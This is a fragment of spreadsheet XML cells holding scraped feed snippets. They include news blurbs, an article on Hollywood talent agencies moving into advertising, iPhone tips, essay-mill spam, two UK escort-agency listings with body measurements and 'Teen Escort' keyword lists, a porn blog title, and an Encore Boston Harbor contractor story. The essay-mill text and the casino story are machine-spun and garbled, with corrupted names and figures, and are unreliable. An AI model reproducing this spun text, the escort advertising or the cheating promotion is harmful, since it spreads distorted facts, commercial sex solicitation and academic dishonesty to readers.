estate startup. Before joining TCV, Zhang spent time in the investment banking divisions of Goldman Sachs and Dorsal Capital Management. Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/dpOhPXhE4_Q/meet-venture-capital-25-rising-stars-in-silicon-valley-2019-7 The post Meet the 25 rising stars in venture capital coming of age during Silicon Valley’s longest bull run in recent history appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>The tropes of the American Jewish novel – death, sex and guilt – are all present in Nathan Englander's funny, moving and provocative Kaddish.com.</t>
  </si>
  <si>
    <t>Toby Crockford</t>
  </si>
  <si>
    <t>Police have asked people to "wake up and be realistic" after the woman missed red flags while being conned through a dating site.</t>
  </si>
  <si>
    <t>Saída do barco Gazprom visto debaixo de água (“FromBelow”) source The post Cascais 52 Super Series Cup 2015 Underwater Cast-off appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Liverpool are hoping to secure a £13.5m deal to sign Bordeaux attacker Francois Kamano as Jurgen Klopp looks to secure his third signing of the summer</t>
  </si>
  <si>
    <t>One to One had contracts to provide care in the north-west of England and Essex. The post Home births at risk as midwife service collapses appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Police are searching for Lui Tiaaleaiga, who escaped a Rockhampton hospital with a bandaged foot.</t>
  </si>
  <si>
    <t>/u/Bobo-1985</t>
  </si>
  <si>
    <t>submitted by /u/Bobo-1985 [link] [comments] The post Hot wife fucks in crotchless nylons – with Tara Spades appeared first on All Amateur Blog.</t>
  </si>
  <si>
    <t>Industry professionals will write your essay in certain days to weeks and you could have your totally free few moments. It’s crucial to defining it as straightforward for those teacher to provide that striking quality. For instance, trainees are expected to offer educational reports and therefore need to use suitable tongue, sentence building, tenses, for example.. Utilising Essay Records Internet Provide feedback 7-Headlines senstionanlization has produced negative effect on the folks. Most of all, individuals are capable of go through up graded news flash over the internet. At the time you buy a pieces of paper on the net, you’re getting a make certain. There’s no chance we won’t have your rear if you come to identify services. The price will depend on the type and urgency. If you pay for essay help out with our system, you’re required to say the actual. If you’ve designed the decision to shop for university pieces of paper, depend on us along with the deliver the results, and you’ll pay for essay be back for much more! Just about anyone deciding on a low-cost essay simply writing service plan should really get accustomed to the seller, its expert services, how much time they’ve experienced. You can find several psyche-mapping applications you may install totally free net. Your details is likely to be kept on our web servers, or other places, but will be safeguarded in every value instances. Your custom made essay will definitely be drafted consistent with the instructions upon your on-line arrangement style. The 30-Secondly Key for Essay Paperwork Internet If this doesn’t, then you prefer to bear in mind that the essay you write is going to be impacted. Essay is various concepts and ideas. The essay is reallyn’t that fundamental. It is one of the needed features essential when crafting. Quite often students effort to stay away from essay composing into their typical analysis method. Regardless of the possibility that it truly is easy to generate close to any sort of essay for almost any topic area, your professor might demand a given system. You’ll be expected to do the right answers while you hear. For everybody who is imagining on how to write an essay that features a great launch, check out to remember that the phrases and words that you apply require to be focus-catching and instructive at the very same time. It is much better to decline to produce an individu essay rather than probability the implications. Then, the survey is focused on his persons is usurping gods rightful place. Our authors are willing https://www.au.grademiners.com/custom-writing to organize any kind of challenge. Your author will get in touch with you and also respond to your texts to verify you’ve a joint comprehension in the order’s precise prefers and desired goals. Health coding might also ask you to shift to an alternative part of the society or a distinct area or state. No assignment is just not entirely possible that our variety of knowledgeable writers. These are turning into quite popular. If you wish to get large high-quality analysis and thesis papers punctually as well as for a very affordable total price, it is best to quite possibly test using EssaySupply.com. Awesome loads of homework allow it to become just about impossible for individuals not aiming to locate an support and to invest in exceptional essay reports. So it is useful to find out how to set up newspapers accurately. A post evaluation examines the many various components of a post with the purpose of establishing the full knowledge of the article. At precisely the same time, you wish to buy an essay cardstock of a top-notch. On the other side, you can order essay web based cheap for a couple of a short time as well as low price. You could now go to the overall body of this compose-up. Be certain that you may have read through it with care to find out the work in front of you. Go to the invest in internet page and judge which form of paper you expect from us. Probably, you desire to estimate the price your old fashioned paper or purely gain knowledge of whenever your document would be willing. Papers can be described as rather crucial components utilized in our everyday lifestyle. Following your paper is prepared, it’s likely to be accessible to get a hold of. Our company provides you with a option to overlook essay authoring. Other essay assistance providing essays over the internet for just a low-priced fee usually do not excellent the personalized essay as Shop for-Finest-Essays.</t>
  </si>
  <si>
    <t>AVENGERS ENDGAME plot holes have been revealed in a hilarious How It Should Have Ended video of Captain America returning the Infinity Stones by time travel. Daily Express :: Films Feed</t>
  </si>
  <si>
    <t>Premier Steven Marshall refuses to rule out the demolition of Thebarton Theatre as he returns from leave to find spot fires on his Government's policy front.</t>
  </si>
  <si>
    <t>AVATAR director James Cameron has congratulated Avengers Endgame for dethroning his film as the highest-grossing of all time. Daily Express :: Films Feed Avatar director James Cameron congratulates Avengers Endgame on TOPPING all-time record</t>
  </si>
  <si>
    <t>It comes after photos of Queensland paramedics giving dying patients final happy moments touched hearts around the world.</t>
  </si>
  <si>
    <t>Oil prices inched lower on Tuesday as the International Energy Agency (IEA) said it would act quickly if needed to keep the market supplied amid tensions in the Middle East and traders eyed a weaker demand outlook.</t>
  </si>
  <si>
    <t>Welcome to escorts in High Shincliffe DH1, covering the whole area of County Durham. We have escorts serving the flats, homes and local hotels in High Shincliffe and the surrounding County Durham areas. High Shincliffe Escort County Durham Escort Services High Shincliffe Escorts - Girls Who Know How to Fulfill You in County Durham Dating is meant to be fun and enjoyable for men and High Shincliffe women but the way things are today, it only becomes frustrating and very depressing. Men who want to date women have to chase them around, try to woo them, buy them gifts and take them to expensive restaurants. Even after doing all of these things, there is no guarantee for men that the woman would be ready to date them. Also, you should only consider putting in all these efforts when you are sure that you are prepared for a commitment. However, it is not necessary anymore for you to be ready to give a commitment when you want to enjoy the companionship of a High Shincliffe escort woman and have. When you just want to have fun, you can get in touch with High Shincliffe escorts. These women will be your companions without wanting anything in return. The High Shincliffe escorts are capable of performing various activities. While you are searching for a decent companion, you would want one that can provide multiple different girlfriend, sexual submissions or role-playing services. The most exclusive and elite agencies will be capable of providing these type of services along with many more services that you might require. This will allow you to realize your deep fantasies. Meaning once the escort has reached the destination, she will call the agency and inform them about the same; this ensures that the County Durham escort has reached safely and on time and she has the qualities that you requested for. You should select a girl that matches your taste, after selecting you to spend the entire day getting closer to one of the County Durham escorts. Don’t be nervous because you are booking the escort services for the first time, the telephone operator at High Shincliffe escort will make you comfortable. If you are worried even after then let the escort you select put you at ease, she will make you feel comfortable. For choosing a companion of your choice, you should first visit the online escort gallery, spend some time browsing various profiles and then make your decision of the High Shincliffe high-end girls. Escort Name: Connie Location: High Shincliffe (DH1 2) Nationality: Venezuelan Spoken Language: English, Polish Age: 18 years old Weight: 55.9kg (123lb) (8st - 11lb) Height: 5 feet 5 inches (165.10cm) Dress Size: XXL Shoe Size: 34 Hair Leigh: Very long Hair Color: Black Eye Color: Hazel Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: Yes Piercings: No Smoking: Yes Drinking: No Availability Area: High Shincliffe Outcall: County Durham Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Connie Escort Name: Leila Location: High Shincliffe (DH1 2) Nationality: Scottish Spoken Language: English, Portuguese Age: 20 years old Weight: 59.1kg (130lb) (9st - 4lb) Height: 5 feet 8 inches (172.72cm) Dress Size: M Shoe Size: 46 Hair Leigh: Medium-Length Hair Color: Brown Eye Color: Green Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: Yes Piercings: No Smoking: Yes Drinking: Occasionally Availability Area: High Shincliffe Outcall: County Durham Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Leila Escort Name: India Location: High Shincliffe (DH1 2) Nationality: American Spoken Language: English, Czech Age: 25 years old Weight: 50.0kg (110lb) (7st - 12lb) Height: 5 feet 5 inches (165.10cm) Dress Size: L Shoe Size: 42 Hair Leigh: Very Short Hair Color: Sapphire Eye Color: Brown Breast: Natural Breast Size: C Pubic Hair: Shaved Mostly Tattooed: No Piercings: No Smoking: Yes Drinking: Occasionally Availability Area: High Shincliffe Outcall: County Durham Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book India Escort Name: Sophia Location: High Shincliffe (DH1 2) Nationality: British Spoken Language: English, Spanish Age: 24 years old Weight: 49.5kg (109lb) (7st - 11lb) Height: 5 feet 10 inches (177.80cm) Dress Size: S Shoe Size: 45 Hair Leigh: Short Hair Color: Black Eye Color: Red Breast: Natural Breast Size: B Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: Occasionally Drinking: Occasionally Availability Area: High Shincliffe Outcall: County Durham Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Sophia Escort Name: Teagan Location: High Shincliffe (DH1 2) Nationality: British Spoken Language: English, Dutch Age: 27 years old Weight: 45.0kg (99lb) (7st - 1lb) Height: 5 feet 5 inches (165.10cm) Dress Size: L Shoe Size: 34 Hair Leigh: Medium-Length Hair Color: Brown Eye Color: Brown Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: Yes Piercings: Yes Smoking: No Drinking: Occasionally Availability Area: High Shincliffe Outcall: County Durham Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Teagan Escort Name: Cher Location: High Shincliffe (DH1 2) Nationality: British Spoken Language: English, Greek Age: 20 years old Weight: 51.4kg (113lb) (8st - 1lb) Height: 5 feet 8 inches (172.72cm) Dress Size: M Shoe Size: 37 Hair Leigh: Medium-Length Hair Color: Salt And Pepper Eye Color: Brown Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: No Piercings: Yes Smoking: Yes Drinking: No Availability Area: High Shincliffe Outcall: County Durham Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Cher Escort Name: Lilly Location: High Shincliffe (DH1 2) Nationality: Irish Spoken Language: English, Finnish Age: 25 years old Weight: 55.9kg (123lb) (8st - 11lb) Height: 5 feet 7 inches (170.18cm) Dress Size: L Shoe Size: 40 Hair Leigh: Short Hair Color: Brunette Eye Color: Red Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: Yes Piercings: No Smoking: Occasionally Drinking: Yes Availability Area: High Shincliffe Outcall: County Durham Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Lilly High Shincliffe Spanish Escort, High Shincliffe Outcall Escort, High Shincliffe Cheap Escort, High Shincliffe Best Escort, High Shincliffe Agency Escort, High Shincliffe French Escort, High Shincliffe Independent Escort, High Shincliffe Walsh Escort, High Shincliffe Brazilian Escort, High Shincliffe Blonde Escort, High Shincliffe Asian Escort, High Shincliffe Polish Escort, High Shincliffe Erotic Escort, High Shincliffe Gay Escort, High Shincliffe Teen Escort, High Shincliffe Mature Escort, High Shincliffe Female Escort, High Shincliffe Incall Escort, High Shincliffe Young Escort, High Shincliffe Male Escort, High Shincliffe Black Escort, High Shincliffe Chinese Escort, High Shincliffe Indian Escort, High Shincliffe British Escort, High Shincliffe Bisexual Escort, High Shincliffe Brunette Escort, High Shincliffe Scottish Escort, High Shincliffe Busty Escort, High Shincliffe Indian Escort, High Shincliffe Irish Escort, High Shincliffe Ebony Escort, High Shincliffe Horny Escort, High Shincliffe Porn Escort, High Shincliffe Massage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High Shincliffe appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>The iphone is a must have product that people want and for an exceptional deal. However, people have questions that need answering. There are many different carriers available and deciding which one is right for you can take a little research. Which applications are the best? Which model is seen as the best value? Read on for more information about iPhones. When you have an iPhone there is an app that helps you avoid getting lost. The maps application comes preloaded, and it helps you determine where you are. This app is helpful to get to a new place, or just to get back home. The iphone makes finding your way around a breeze. The iphone comes with a built-in map application that shows you where you are at all times. This application is great for finding your way back home, or to a new destination you haven’t visited yet. Getting a larger keyboard makes web browsing simpler. You do not have to purchase a larger keyboard for this to happen. From the Safari browser, rotate your phone sideways and tap on the address bar. The keyboard instantly becomes larger and far more easy to use. Always update your device whenever you can. This will help ensure your phone is working as fast and efficiently as possible. This will allow you to keep a backup of all your pictures and information so you do not lose everything if your phone is damaged or lost. You can turn your favorite website in an app. To try this out, visit the site. Once you are there, tap on “Go”. This then gives you the option for adding this site to the home screen. After the shortcut appears on the homepage, you have the option of renaming it. Turn your iPhone’s brightness settings down if you want to get more out of its battery. Simply go the settings option on your iphone and select the brightness option. This will lengthen the time that the battery is powered between charges. You can create shortcuts and a dictionary on your iPhone. A custom dictionary can recognize what it is you wish to say. In addition, you can add more phrases to make more shortcuts. The keyboard automatically corrects your typing as you go. When searching the web with your iphone, you do not have to type in the “.com” part of an address. Simply type in the main portion of the address. Your web browser will understand what you are saying and will put you on the right site. This might not seem important, but it will save lots of time during the time you have your phone. You will need to download an app to allow your iPhone to function as a storage drive. With an app like this, you’ll be able to upload video, music, photo and text files to your iPhone. You just connect your iPhone to your computer and transfer your files from your computer to your iPhone. An iPhone’s notification feature can become annoying. There is an easy way to stop them. Press the Settings button, then press the Notifications bar. Go to your apps and get rid of anything that you don’t want there. As a bonus, this will increase battery life. The iPhone gives you the flexibility of being able to capture a picture directly from the cord your headphones. Begin by focusing the camera on the subject you would like to capture. Then, when you are ready to take your picture, push the button on your headphone cord. This takes the picture. Follow the same steps as usual to save or alter the photo. You can message faster using this tip. When a dictionary suggestion appears that is not the word you want, make it disappear with a tap to any part of the screen. You do not need to hit the small “x” that follows the word. When going to a site, scroll with two fingers and one finger. When the webpages has boxes, one finger scrolling lets you see each box individually. You can scroll through the whole page with two fingers. This article has provided you with information on your iphone. Remember the information you have just learned in order to get the most of your current iphone or a future one. As with many smartphones, you’re able to set your iPhone to give you a visual when you have an incoming call or message. If you want silent notifications, you can configure your iPhone’s camera to flash and blink when a call or message comes in. Head to Settings, then General, then click on Accessibility. Once you do this, select the “LED Flash” option. Put the information that you learn into effect to maximize your success. You should definitely make sure you learn the basics. You will be an expert in no time at all.</t>
  </si>
  <si>
    <t>Sally Rawsthorne</t>
  </si>
  <si>
    <t>The AFP insist they are making a dent in the huge volume of drugs arriving into Australia, as three men face court on in relation to an alleged cocaine bust</t>
  </si>
  <si>
    <t>Welcome to escorts in Lanesfield WV4, covering the whole area of West Midlands. We have escorts serving the flats, homes and local hotels in Lanesfield and the surrounding West Midlands areas. Lanesfield Escort West Midlands Escort Services Lanesfield Escorts - Girls Who Know How to Fulfill You in West Midlands One of the most popular and lucrative industries as far as entertainment is concerned is the escort service industry. The demand for escorts continues to grow, and the business is getting bigger by the day. If you are going to be in Lanesfield any time in the future, then you should know that the escort business here is booming and you can take advantage of this development when you are here. There are several good agencies now in the area that provide you the services of beautiful, discrete and professional Lanesfield escorts. These services are legal, and you can be with them for as long as you like and enjoy their companionship. Elite Lanesfield escorts are the women who would not stop at anything when it comes to your entertainment. These women are very naughty, and they have a list of naughty, sexy and kinky games that they would like to play for you! You can prolong the excitement by beginning your day exploring the outdoor markets, the antique stores and sit at some of the cafes. These girls love to have fun, and you should not be surprised if you see her playing footsie with you under the table when you are sitting at a restaurant or a café! A trip to Lanesfield would ensure that you get a good break from your dull and monotonous life and have some delightful time. You can enjoy an intimate and romantic date with Lanesfield escorts and find yourself in the company of a woman who would be playful and very naughty. These lovely ladies would be ready to attend the theater with you or enjoy a picnic lunch with you at one of the parks. With your date, you can even participate in an open-air performance and get to know her better. The best thing about these women is that they are very open-minded and quite adventurous. Escort Name: Rosemary Location: Lanesfield (WV4 6) Nationality: Moldovian Spoken Language: English, Hebrew Age: 22 years old Weight: 54.1kg (119lb) (8st - 7lb) Height: 5 feet 4 inches (162.56cm) Dress Size: M Shoe Size: 44 Hair Leigh: Very Short Hair Color: Blonde Eye Color: Brown Breast: Natural Breast Size: B Pubic Hair: Shaved Mostly Tattooed: Yes Piercings: No Smoking: Occasionally Drinking: No Availability Area: Lanesfield Outcall: West Midlands Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Rosemary Escort Name: Violet Location: Lanesfield (WV4 6) Nationality: English Spoken Language: English, Spanish Age: 20 years old Weight: 67.3kg (148lb) (10st - 8lb) Height: 5 feet 6 inches (167.74cm) Dress Size: L Shoe Size: 36 Hair Leigh: Long Hair Color: Bronde Eye Color: Gray Breast: Natural Breast Size: C Pubic Hair: Trimmed Tattooed: Yes Piercings: No Smoking: Occasionally Drinking: Yes Availability Area: Lanesfield Outcall: West Midlands Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Violet Escort Name: Eileen Location: Lanesfield (WV4 6) Nationality: Welsh Spoken Language: English, Lithuanian Age: 37 years old Weight: 57.3kg (126lb) (9st - 0lb) Height: 5 feet 5 inches (165.10cm) Dress Size: S Shoe Size: 37 Hair Leigh: Short Hair Color: Brunette Eye Color: Hazel Breast: Natural Breast Size: J Pubic Hair: Shaved Mostly Tattooed: No Piercings: No Smoking: No Drinking: Yes Availability Area: Lanesfield Outcall: West Midlands Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Eileen Escort Name: Hester Location: Lanesfield (WV4 6) Nationality: Russian Spoken Language: English, Dutch Age: 21 years old Weight: 59.5kg (131lb) (9st - 5lb) Height: 5 feet 6 inches (167.74cm) Dress Size: L Shoe Size: 40 Hair Leigh: Short Hair Color: Bronde Eye Color: Hazel Breast: Natural Breast Size: FF Pubic Hair: All Natural Tattooed: No Piercings: No Smoking: Occasionally Drinking: No Availability Area: Lanesfield Outcall: West Midlands Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Hester Escort Name: Ashley Location: Lanesfield (WV4 6) Nationality: British Spoken Language: English, Spanish Age: 21 years old Weight: 70.0kg (154lb) (11st - 0lb) Height: 5 feet 2 inches (157.48cm) Dress Size: M Shoe Size: 40 Hair Leigh: Long Hair Color: Black Eye Color: Blue Breast: Natural Breast Size: B Pubic Hair: Shaved Completely Tattooed: Yes Piercings: No Smoking: No Drinking: No Availability Area: Lanesfield Outcall: West Midlands Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Ashley Lanesfield Indian Escort, Lanesfield Horny Escort, Lanesfield Independent Escort, Lanesfield Young Escort, Lanesfield Walsh Escort, Lanesfield Best Escort, Lanesfield Irish Escort, Lanesfield Spanish Escort, Lanesfield Male Escort, Lanesfield Massage Escort, Lanesfield Outcall Escort , Lanesfield Porn Escort, Lanesfield Ebony Escort, Lanesfield Teen Escort, Lanesfield Asian Escort, Lanesfield Polish Escort, Lanesfield Blonde Escort, Lanesfield Indian Escort, Lanesfield Busty Escort, Lanesfield Agency Escort, Lanesfield Chinese Escort, Lanesfield Female Escort, Lanesfield Cheap Escort, Lanesfield Mature Escort, Lanesfield Erotic Escort, Lanesfield British Escort, Lanesfield Brazilian Escort, Lanesfield Gay Escort, Lanesfield Brunette Escort, Lanesfield Scottish Escort, Lanesfield Bisexual Escort, Lanesfield Incall Escort, Lanesfield French Escort, Lanesfield Black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Lanesfield appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/AftTUDFos-E/brands-like-pg-and-delta-are-using-hollywood-talent-agencies-2019-7 Big brands like Delta, P&amp;G and Under Armour are increasingly hiring Hollywood talent agencies like CAA, Endeavor and UTA for marketing — posing yet another threat to traditional ad agencies Hollywood talent and entertainment giants, and companies with their roots in talent, including CAA, WME | IMG (now Endeavor), and UTA have increasingly been branching out into advertising. Their pitch is that by being at the epicenter of entertainment and creativity, they are more plugged in than Madison Avenue and help drive popular culture. Brands including P&amp;G, Delta, and Under Armour are using talent agencies to test new ad environments like streaming platforms Netflix and Hulu. Talent agencies have gone down the advertising path before, but not always successfully. Coca-Cola, for example, hired CAA in 1991, but the relationship didn’t last. Click here for more BI Prime stories. Consulting giants aren’t the only ones circling the ad agency business. Hollywood talent and entertainment giants, and companies with their roots in talent management, including CAA, WME | IMG (now Endeavor), and UTA have been branching out into advertising, helping big-name brands with talent tie-ins, strategy, and distribution deals. While CAA’s Brand Consulting group works with clients including Tissot and JPMorgan Chase, Observatory, which succeeded CAA Marketing in 2017, has developed branded content and experiences for the likes of Marriott, Anheuser-Busch, and Bonobos. UTA Marketing has worked with brands like GM, Lyft and Procter &amp; Gamble on branded content and distribution, and Endeavor Global Marketing’s roster includes Audi, Papa John’s, Visa, and Under Armour, according to its recent IPO filing. The lines between Hollywood and Madison Avenue have started to blur, said Forrester Analyst Jay Pattisall, calling Hollywood talent agencies “yet another set of competitors for agencies.” This exacerbates the string of existential threats ad agencies already face. CAA, Endeavor, and UTA are charging into advertising As talent agencies try to carve a piece out of the $240-billion US advertising pie, their pitch is that being at the epicenter of entertainment and creativity, they aren’t only more plugged in than Madison Avenue, but they help drive popular culture. Their unparalleled access to the Hollywood production pipeline gives them an advance look into which movies and Netflix shows may be coming out, supplying them with fodder for brands hungry for new ways to get their message in front of ad-averse consumers. “It’s great when a brand can hold up a mirror and reflect culture, but it’s even better when a brand can lead culture,” said Amia Lazarus, head of strategy and entertainment consulting at Observatory. “I want my brands to be magnets, and not just a mirror.” Endeavor dubs itself in its IPO filing “the agency of record for global blue-chip brands” like Budweiser parent Anheuser-Busch InBev and Visa, which collectively spend more than $60 billion in advertising per year. It also lists acquisitions it has made to expand its services, including Philadelphia-based creative shop 160over90 and experiential marketing agencies IMG Live and Fusion Marketing. Launched in 2011, CAA Brand Consulting has 250 employees and has grown annual revenue and profit by “double digits,” said a CAA spokeswoman. It manages $4 billion in sponsorship rights under management. UTA, too, has put a bigger focus on marketing in recent years, acquiring entertainment marketing firm Blue Group Entertainment in 2018 to expand to New York and picking up at least five new clients in the past year, said UTA Marketing co-head Julian Jacobs, adding that its clients make up a combined market cap value of $1.5 trillion. “Talent agencies have had the reputation of being all smoke and mirrors for a long time, but we’ve really tried to arm our clients with data that shows why they should partner with a certain show or talent,” said Jacobs. One client is P&amp;G, which has been focusing on nontraditional advertising avenues, topics and partners, such as over-the-top streaming content that expresses a brand’s point-of-view and sponsorship programs that can help disguise advertising. Read More: Consumers are avoiding ads more than ever, so P&amp;G is striking creative partnerships with big names like John Legend and Arianna Huffington This approach has taken the form of long-term projects with Arianna Huffington and John Legend, documentaries with Queen Latifah on Hulu, and $15 million being pumped into Jeffrey Katzenberg’s Quibi. Some of these deals have been orchestrated not by a traditional ad agency, but by talent agencies including UTA. “It’s very clear that mass marketing as we know it is being disrupted,” P&amp;G’s chief brand officer Marc Pritchard told Business Insider earlier this year. “And our focus is to lead that disruption by reinventing brand building.” Indeed, a big reason for talent agencies’ newfound place in advertising is the increased fragmentation of media and consumer attention. Advertising is being disrupted, traditional TV continues to decline, and even digital ads are being blocked, forcing brands to think beyond interruptive ad formats. At the same time, over-the-top streaming is growing exponentially and streaming giants including Netflix and Hulu, are using brands to get attention for shows such as “Stranger Things.” These environments provide brands with new testing grounds to figure out what advertising of the future could look like. Read More: ‘Stranger Things’ is back. Here’s how Netflix used brands like Coca-Cola and Baskin-Robbins in a massive marketing push for its return Amid this changing landscape, talent agencies see an opening to act as a broker between publishers, talent, and marketers. As they face margin pressures of their own, working with marketers is a way for them to parlay their access into new revenue streams that can reel in more money than traditional agenting. Endeavor, UTA and CAA have all made inroads sports marketing as well as production, for example. “Brands today have to create content and experiences that attract and engage audiences the way that entertainment does,” said Jae Goodman, former co-head and chief creative officer at CAA Marketing and current CEO of Observatory. “And we are the companies that can enable that.” Brands are working with talent agencies beyond their traditional roles Beyond P&amp;G, Delta, Lyft, Anheuser-Busch, Marriott, and Bonobos have increased the scope of their work with talent agencies. When Swiss watchmaker Tissot wanted to expand its US presence in 2016, it hired CAA’s Brand Consulting group to handle the sponsorship strategy and marketing for its NBA sponsorship deal. Today, CAA Brand Consulting serves as its de facto agency of record, handling social media, content development, and experiential activations, said a CAA spokesman. CAA created an influencer program for Tissot that tripled its social impressions, and got the watchmaker featured on timers across basketball courts. At the 2019 NBA All-Star Game in Charlotte, it built “The Tissot Style Lounge” at The Epicentre, a 2,000-square-foot pop-up shop that generated 660 million impressions. Delta was UTA Marketing’s flagship client and has used the division for years. To help Delta market to the tech and entertainment industries, UTA Marketing helped create “Delta Festival Shuttle,” invite-only flights for talent, musicians and entertainment executives traveling to events like the Sundance Film Festival and SXSW. More recently, UTA has developed content strategy and partnerships for the airline’s in-flight entertainment platform Delta Studio, including podcasts with Goop, LinkedIn, and Wondery and distribution deals with Warner Bros. and National Geographic. For Bonobos, Observatory has gone from being one of its many agencies to its agency of record. Micky Onvural, CEO at Bonobos, has had a longstanding relationship with Observatory, in which CAA has a minority stake, since she was an executive at eBay and Observatory was still known as CAA Marketing. “For some, the question is whether they can apply that to an advertiser’s brand and business metrics,” said Onvural. “But the clear advantage of talent agencies is their knowledge of culture, content creation and their obvious relationships with a broad array of talent.” Observatory has also worked on projects with Anheuser-Busch across Mexico and Brazil, such as The Corona Mexico “Mas Fina” campaign, which started rolling out in March. Ricardo Dias, VP of marketing at Cervejaria Ambev (Anheuser-Busch’s Brazil unit), said that talent agencies will “without a doubt be the future” of advertising, and that expected 20% of his marketing budget to go to those agencies in two years, up from 5% today. “The old adage was that nobody was ever fired for making a beautiful TV commercial, but the era of paid media is coming to an end,” Dias said. “Now you can pay $10 a month to not be interrupted while watching content, so brands have to be creative to entertain people.” Talent agencies have gone down the advertising path before — not always successfully Talent agencies have made a play for advertising dollars before. Chevrolet tied up with Columbia Pictures in 1984 for “Ghostbusters” to build brand loyalty with college kids. And in 1991, Coca-Cola sent ripples through the advertising industry when it hired CAA to handle its media and communications, an unprecedented move that eventually pitted it against Coke’s long-time agency McCann-Erickson. But Coca-Cola ditched CAA in 1995 after its the “Always Coca-Cola” campaign that created Coke’s polar bears. More recently, CAA spun off CAA Marketing into Observatory, an independent agency in which Stagwell Media has a majority stake; while Endeavor divested its 49% stake in Droga5 ahead of filing for an IPO. These shifts suggest that talent agencies don’t pose an immediate threat to ad agencies, said Robert Schwartz, CMO at Dentsu agency Carat. He acknowledged that talent agencies’ relationships with culture, talent, and increasingly sports and athletes gave them an edge. But he said that they couldn’t compete with the breadth of offerings, diverse talent, and global footprint of ad agencies. “I haven’t seen a lot of expansion beyond the core areas of documentaries, short films, and celebrity-driven endorsements,” Schwartz said. “I don’t wake up in the morning and think of them as a threat.” Some marketers said that it would be unfair overstate the importance of talent agencies. P&amp;G said talent agencies are just one among the agencies and other content companies it works with. “There are vast sources of creativity available today, and P&amp;G is working with a number of partners in the ad industry and with other creative industries such as filmmaking, music, comedy, technology and journalism — to create stories never told or experienced before,” a P&amp;G spokeswoman told Business Insider. And ad agencies aren’t taking the threat lying down, either. Holding company Havas bought Los Angeles-based agency Battery, which will be integrated with its non-traditional agency Annex to focus on gaming and streaming entertainment. The Annex competes with the likes of Translation, CAA’s Observatory, and Endeavor rather than traditional holding companies, Havas North America CEO and Annex co-founder recently Paul Marobella told MediaPost. Read More: An ad agency put graffiti artists and Instagram stars in charge, and managed to pull in $30 million in revenue The advertising industry has been in a quest to reinvent itself, with holding companies trying to simplify their structures, generalists vying to become specialists, interactive shops trying to develop full-service capabilities, and traditional shops trying to evolve into digital agencies. Some brands see a future where clients are served by all kinds of agencies, talent agencies and consulting firms, as well as in-house teams. “As creative teams are formed in house, there will be a ‘third leg to the stool’ – in-house creative, talent agency creative, and advertising agency creative,” said Bonobos’ Onvural. “The question will be the balance and working relationship between all three in order to create optimal outcomes for brands and businesses.” Join the conversation about this story » NOW WATCH: Burger King’s CMO explains why the biggest risk in marketing is not taking one Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/AftTUDFos-E/brands-like-pg-and-delta-are-using-hollywood-talent-agencies-2019-7 The post Big brands like Delta, P&amp;G and Under Armour are increasingly hiring Hollywood talent agencies like CAA, Endeavor and UTA for marketing — posing yet another threat to traditional ad agencies appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>My Kinks: Webcam profile: sexy and hot Favourite sex position: doggy-style What I do in my amateur show: polite people What I don’t like: impolite people Gallery</t>
  </si>
  <si>
    <t>Federal crossbenchers have lashed out at "morally corrupt" politicians who are not heeding calls for a more powerful commission to investigate corruption.</t>
  </si>
  <si>
    <t>Encore Celtics Harbor sub-contractors claiming to generally be owed money. Chinese lotteries post unsatisfying May sales figures On Massachusetts and a row will be reportedly brewing between Wynn Resorts Limited and sub-contractors who in order to be you owe tens of huge amounts of money connected with to be able to construct its recently-opened Encore Boston Possess integrated casino resort. Voluptuous venue: In accordance with a Saturday report from Boston Herald newspaper, the particular $2. some billion Encore Boston Possess began enticing guests survive Sunday using over a couple of years of work that required some six, 000 establishing workers. The home or property located in the exact northern Celtics suburb connected with Everett carries a 671-room lodging alongside places to eat, meeting along with convention gaps, retail outlets and also a three , 000, 000 square bottom casino. Additional operate: But , Sue Mailman, from local firm, Coghlin Electrical Companies, reportedly told the papers that her company continues to owed around $30 , 000, 000 after executing several ‘change orders’ to the Massachusetts ability. These projects purportedly require work which has been added to the unique scope of each agreed written agreement at a later date utilizing sub-contractors normally billing for changes all every month. Mailman reportedly stated to the Boston Herald… “There’s a process that always happens to assess the changes every month between the sub-contractors and the proprietor so that we will allowed to costs for all the change that is happening. We were explained to specifically to do the work we were assigned and then ordered to accomplish extra work. A lot of the fact that piled up when they get home and we didn’t been taken care of a lot of the changes that occurred. ” Preventable interest: The Boston Herald reported that a second localized firm, MILLILITERS McDonald, is usually claiming for being owed around $4 million dollars after it all carried out ‘finishing services’ in the 33-acre Encore Boston Possess, which listed fire-proofing be employed well since the painting with the venue’s internet casino and places to eat. The owner of the corporation, Peter Townsend, purportedly announced that this scenario has led to your man ‘paying fascination to the bank’ instead of employing cash working out and cultivate his business. Townsend said… “We’re using a line of credit with all the bank only to have to take out a loan to economic the work we tend to did through Encore Boston Harbor. We pay off our working people weekly together with vendors regular. I’m owed north associated with $4 thousand and others are generally way former that in addition to Wynn Resorts Limited should take time to negotiate any haircut and that becomes a internet business decision. Every person who performed at Encore Boston Harbor is with 